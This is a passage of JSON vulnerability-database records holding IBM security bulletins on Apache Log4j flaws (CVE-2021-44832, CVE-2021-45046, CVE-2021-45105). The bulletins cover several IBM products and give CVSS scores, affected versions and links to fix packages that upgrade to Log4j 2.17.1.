"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T01:45:15", "id": "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "href": "https://www.ibm.com/support/pages/node/6551310", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:19", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther+software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther+software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. 
This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 
3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:09:05", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling External Authentication Server (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:09:05", "id": "4AF3F2925FA2FAC4247303F748E1EABFA2DFEF4045F7C3DA1E06B8C833F40639", "href": "https://www.ibm.com/support/pages/node/6538684", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:24", "description": "## Summary\n\nApache Log4j is used by IBM Netcool Agile Service Manager as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. 
By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Netcool Agile Service Manager| 1.1 - 1.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now. **\n\nFor IBM Netcool Agile Service Manager v1.1 - v1.1.9, upgrade to v1.1.10. \nFor v1.1.10, refresh to the packages that were uploaded on 14th January 2022.\n\nGo to [Download IBM Netcool Agile Service Manager V1.1.10 on premise](<https://www.ibm.com/support/pages/node/589201> \"Download IBM Netcool Agile Service Manager V1.1.10 on premise\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n13 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9LQB\",\"label\":\"Netcool Agile Service Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.1.10\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-21T17:03:35", "type": "ibm", "title": "Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-21T17:03:35", "id": "30495EE9B3C48AB51AC589D2A5956D977474A3BCCB9A67B54801DEE7685C5573", "href": "https://www.ibm.com/support/pages/node/6549838", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:33", "description": "## Summary\n\nApache Log4j is used by IBM Spectrum Symphony for generating logs in some of its components such as ELK, GUI and so on. This bulletin provides interim fixes which include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Symphony.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.2, 7.2.0.2 \nIBM Spectrum Symphony| 7.2.1, 7.2.1.1 \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| \n\n7.2/7.2.0.2\n\n| \n\nP104544\n\nP104504\n\nP104509\n\nP104522\n\nP104521\n\n| \n\n[sym-7.2-build600980](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2-build600980&includeSupersedes=0> \"sym-7.2-build600980\" )\n\n[sym-7.2.0.2-build600934](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600934&includeSupersedes=0> \"sym-7.2.0.2-build600934\" )\n\n[sym-7.2.0.2-build600939](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600939&includeSupersedes=0> \"sym-7.2.0.2-build600939\" )\n\n[sym-7.2.0.2-build600941](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600941&includeSupersedes=0> \"sym-7.2.0.2-build600941\" )\n\n[sym-7.2.0.2-build600944](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600944&includeSupersedes=0> \"sym-7.2.0.2-build600944\" ) \n \nIBM Spectrum Symphony| 7.2.1/7.2.1.1| 
\n\nP104505\n\nP104510\n\nP104524\n\nP104523\n\n| \n\n[sym-7.2.1-build600935](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600935&includeSupersedes=0> \"sym-7.2.1-build600935\" )\n\n[sym-7.2.1-build600940](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600940&includeSupersedes=0> \"sym-7.2.1-build600940\" )\n\n[sym-7.2.1-build600942](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600942&includeSupersedes=0> \"sym-7.2.1-build600942\" )\n\n[sym-7.2.1-build600945](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600945&includeSupersedes=0> \"sym-7.2.1-build600945\" ) \n \nIBM Spectrum Symphony| 7.3| \n\nP104506\n\nP104508\n\n| \n\n[sym-7.3-build600936](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600936&includeSupersedes=0> \"sym-7.3-build600936\" )\n\n[sym-7.3-build600943](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600943&includeSupersedes=0> \"sym-7.3-build600943\" ) \n \nIBM Spectrum Symphony| 7.3.1| P104507| [sym-7.3.1-build600937](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build600937&includeSupersedes=0> \"sym-7.3.1-build600937\" ) \nIBM Spectrum Symphony| 7.3.2| P104511| 
[sym-7.3.2-build600938](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build600938&includeSupersedes=0> \"sym-7.3.2-build600938\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes **section.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZUMP\",\"label\":\"IBM Spectrum Symphony\"},\"Component\":\"GUI\\/PERF\\/ELK\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.3.2;7.3.1;7.3;7.2.1;7.2.0.2\",\"Edition\":\"7.3.2;7.3.1;7.3;7.2.1;7.2.0.2\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T02:51:34", "type": "ibm", "title": "Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Symphony is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T02:51:34", "id": "5662007982BBB6B88D91C6C7393CC2022D9415D2290FD0DA76D55E99204FFF35", "href": "https://www.ibm.com/support/pages/node/6539410", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:37:58", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which is used by IBM Engineering Systems Design Rhapsody (RDM) components; Knowledge Center and Test Conductor for logging . The fix includes upgrade to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Systems Design Rhapsody| 9.0, 9.0.1 \nRational Rhapsody| 8.4 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nFor **IBM Engineering Systems Design Rhapsody** follow the instructions to apply the following fixes:\n\n1\\. 
The Knowledge Center component for a locally installed help server (KCCI) that is (optionally) installed and configured for the following products: IBM Engineering Systems Design Rhapsody Versions** 8.4, 9.0, 9.0.1.** Select the appropriate version link below and follow the instructions from the support page.\n\n * [8.4](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"8.4\" )\n * [9.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0\" )\n * [9.0.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-Rhapsody&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0.1\" )\n\n2\\. Next, For IBM Engineering Systems Design Rhapsody Versions **9.0, 9.0.1** you will need to also update the **Test Conductor** component. 
Click the link below for the affected version and follow the instructions from the support page.\n\n * [9.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Rhapsody-9.0-TestConductorAdapterForETM-log4j-patch&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0\" )\n * [9.0.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Systems+Design+Rhapsody&release=All&platform=All&function=fixId&fixids=Rhapsody-9.0.1-TestConductorAdapterForETM-log4j-patch&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"9.0.1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n04 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSB2MU\",\"label\":\"IBM Engineering Systems Design Rhapsody\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"9.0,9.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7P9W\",\"label\":\"Rational Rhapsody\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 